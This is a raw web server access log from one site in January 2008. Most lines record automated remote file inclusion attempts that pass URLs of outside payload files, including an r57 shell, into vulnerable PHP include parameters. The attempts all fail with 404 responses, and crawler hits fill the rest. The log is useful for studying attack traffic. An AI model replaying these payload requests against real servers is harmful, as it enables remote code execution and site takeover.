69.64.49.252 - - [20/Jan/2008:18:07:14 -0800] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:18:07:20 -0800] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.175.50 - - [20/Jan/2008:18:10:02 -0800] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
67.15.175.50 - - [20/Jan/2008:18:10:16 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:18:12:20 -0800] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.231 - - [20/Jan/2008:18:13:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.231 - - [20/Jan/2008:18:13:19 -0800] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:18:14:31 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.15.252.72 - - [20/Jan/2008:18:15:10 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://ireshe.com/purchasing/wp-content/uploads/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.15.252.72 - - [20/Jan/2008:18:15:42 -0800] "GET /logs/access_070827.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://ireshe.com/purchasing/wp-content/uploads/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.15.252.72 - - [20/Jan/2008:18:15:42 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://ireshe.com/purchasing/wp-content/uploads/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.15.252.72 - - [20/Jan/2008:18:15:42 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://ireshe.com/purchasing/wp-content/uploads/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:18:43 -0800] "GET /logs/access_071210.log/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:18:43 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:18:43 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:19:28 -0800] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:19:28 -0800] "GET /logs/access_071210.log/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:19:28 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:19:28 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.247.116 - - [20/Jan/2008:18:20:07 -0800] "GET /logs/access_071014.log/home.php?table=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:18:20:09 -0800] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.247.116 - - [20/Jan/2008:18:20:16 -0800] "GET /logs/home.php?table=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
204.15.252.72 - - [20/Jan/2008:18:23:48 -0800] "GET /logs/access_070826.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://ireshe.com/purchasing/wp-content/uploads/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:18:25:00 -0800] "GET /logs/access_071008.log/index2.php?x=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:18:25:45 -0800] "GET /logs/access_070820.log/index2.php?x=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.91.224.17 - - [20/Jan/2008:18:26:35 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [20/Jan/2008:18:26:36 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [20/Jan/2008:18:27:16 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [20/Jan/2008:18:27:16 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [20/Jan/2008:18:28:00 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [20/Jan/2008:18:29:12 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [20/Jan/2008:18:30:03 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [20/Jan/2008:18:31:10 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:18:31:34 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:31:42 -0800] "GET /logs/access_071014.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:31:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:31:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.91.224.17 - - [20/Jan/2008:18:31:51 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [20/Jan/2008:18:32:49 -0800] "GET /logs/ HTTP/1.1" 200 5619 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:33:16 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:18:33:25 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:18:33:25 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:18:33:25 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:18:33:25 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
70.84.105.244 - - [20/Jan/2008:18:35:13 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:36:08 -0800] "GET /logs/index2.php?url_page=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:36:08 -0800] "GET /index2.php?url_page=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:18:37:39 -0800] "GET //modules/xfsection/modify.php?dir_module=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:18:38:15 -0800] "GET /logs/access_071203.log//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:18:38:16 -0800] "GET //magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:18:38:16 -0800] "GET /logs//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:38:35 -0800] "GET /logs/access_070806.log/index2.php?url_page=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:38:40 -0800] "GET /logs/access_070723.log/index2.php?url_page=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:39:33 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:18:44:13 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:18:44:13 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:46:09 -0800] "GET /logs/access_070723.log/middle.php?file=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:18:46:09 -0800] "GET /logs/access_070806.log//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:46:10 -0800] "GET /middle.php?file=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:46:10 -0800] "GET /logs/middle.php?file=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:18:48:06 -0800] "GET /logs/access_071210.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:18:48:06 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:18:48:06 -0800] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:49:42 -0800] "GET /logs/middle.php?page=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:49:42 -0800] "GET /middle.php?page=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:50:29 -0800] "GET /logs/access_070723.log/middle.php?page=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:50:30 -0800] "GET /middle.php?page=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:50:30 -0800] "GET /logs/middle.php?page=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:50:31 -0800] "GET /logs/access_070723.log/middle.php?file=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:50:32 -0800] "GET /middle.php?file=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:18:50:32 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.catim.com/legislacao/.bht/r57.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [20/Jan/2008:18:50:32 -0800] "GET /logs/middle.php?file=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.56.111.194 - - [20/Jan/2008:18:50:51 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
195.56.111.194 - - [20/Jan/2008:18:50:51 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
200.90.179.94 - - [20/Jan/2008:18:51:10 -0800] "GET //index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [20/Jan/2008:18:51:10 -0800] "GET //magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [20/Jan/2008:18:51:10 -0800] "GET /logs//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [20/Jan/2008:18:51:10 -0800] "GET /logs//index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.24.49 - - [20/Jan/2008:18:51:12 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.225.199.128 - - [20/Jan/2008:18:51:30 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gassner-design.de/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
195.225.199.128 - - [20/Jan/2008:18:51:32 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gassner-design.de/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
70.84.105.244 - - [20/Jan/2008:18:51:54 -0800] "GET /logs/access_071014.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.105.244 - - [20/Jan/2008:18:51:54 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:18:52:04 -0800] "GET /logs/access_071210.log//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:18:52:04 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:18:52:04 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:18:52:11 -0800] "GET /logs/access_071210.log//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:18:52:11 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:18:52:11 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:52:12 -0800] "GET /logs/access_070806.log/index1.php?dat=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:52:13 -0800] "GET /index1.php?dat=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:52:13 -0800] "GET /logs/index1.php?dat=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:18:52:30 -0800] "GET /logs/access_070826.log/index1.php?dat=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.53.138.150 - - [20/Jan/2008:18:53:48 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [20/Jan/2008:18:53:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.119.200.212 - - [20/Jan/2008:18:54:39 -0800] "GET /logs/access_071203.log//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [20/Jan/2008:18:54:39 -0800] "GET //magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [20/Jan/2008:18:54:40 -0800] "GET /logs//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.216.104 - - [20/Jan/2008:18:56:56 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:56:57 -0800] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.127.2.93 - - [20/Jan/2008:18:57:28 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.127.2.93 - - [20/Jan/2008:18:57:28 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:01:05 -0800] "GET /logs/access_080107.log//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:01:12 -0800] "GET /logs/access_080107.log//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:19:04:03 -0800] "GET /logs/access_071014.log//modules/xfsection/modify.php?dir_module=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:19:04:03 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.119.200.212 - - [20/Jan/2008:19:04:23 -0800] "GET /logs/access_070806.log//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:19:04:34 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:19:04:35 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:19:04:51 -0800] "GET /logs/access_071203.log//modules/xfsection/modify.php?dir_module=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.189.4.131 - - [20/Jan/2008:19:05:14 -0800] "GET /100http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.18.66 - - [20/Jan/2008:19:07:48 -0800] "GET /logs/access_071112.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.18.66 - - [20/Jan/2008:19:07:48 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.18.66 - - [20/Jan/2008:19:07:49 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:19:08:42 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:19:08:42 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.56.111.194 - - [20/Jan/2008:19:08:44 -0800] "GET /logs//forum.php?id=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
195.56.111.194 - - [20/Jan/2008:19:08:44 -0800] "GET //forum.php?id=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
87.230.3.98 - - [20/Jan/2008:19:08:46 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
